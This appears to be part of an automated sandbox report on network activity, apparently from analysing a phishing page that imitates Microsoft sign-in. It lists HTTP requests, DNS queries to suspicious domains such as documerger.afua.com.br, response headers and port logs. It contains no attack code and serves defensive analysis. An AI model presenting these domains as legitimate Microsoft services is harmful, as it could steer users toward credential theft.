              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yxKAAfE1arTmDDx&MD=11F9SbpG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: adrianocarreira.com
              Source: global trafficDNS traffic detected: DNS query: documerge.arroiodosilva.com.br
              Source: global trafficDNS traffic detected: DNS query: documerger.afua.com.br
              Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
              Source: global trafficDNS traffic detected: DNS query: portal.microsoftonline.com
              Source: unknownHTTP traffic detected: POST /report/ESTS-UX-All HTTP/1.1Host: csp.microsoft.comConnection: keep-aliveContent-Length: 977sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/csp-reportAccept: */*Origin: https://documerger.afua.com.brSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: reportReferer: https://documerger.afua.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 17:09:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 9f67a086-0c0d-4403-9d54-a82b6fcdba00x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-bTmh0LgoI4xcwOro9nptEg' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Wed, 27 Nov 2024 17:09:57 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
              Source: chromecache_63.3.dr, chromecache_68.3.dr, chromecache_61.3.dr, chromecache_70.3.drString found in binary or memory: http://knockoutjs.com/
              Source: chromecache_68.3.dr, chromecache_61.3.drString found in binary or memory: http://www.json.org/json2.js
              Source: chromecache_63.3.dr, chromecache_68.3.dr, chromecache_61.3.dr, chromecache_70.3.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
              Source: chromecache_63.3.dr, chromecache_70.3.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
              Source: chromecache_68.3.dr, chromecache_61.3.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js
              Source: chromecache_58.3.drString found in binary or memory: https://login.microsoftonline.com
              Source: chromecache_58.3.drString found in binary or memory: https://login.windows-ppe.net
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
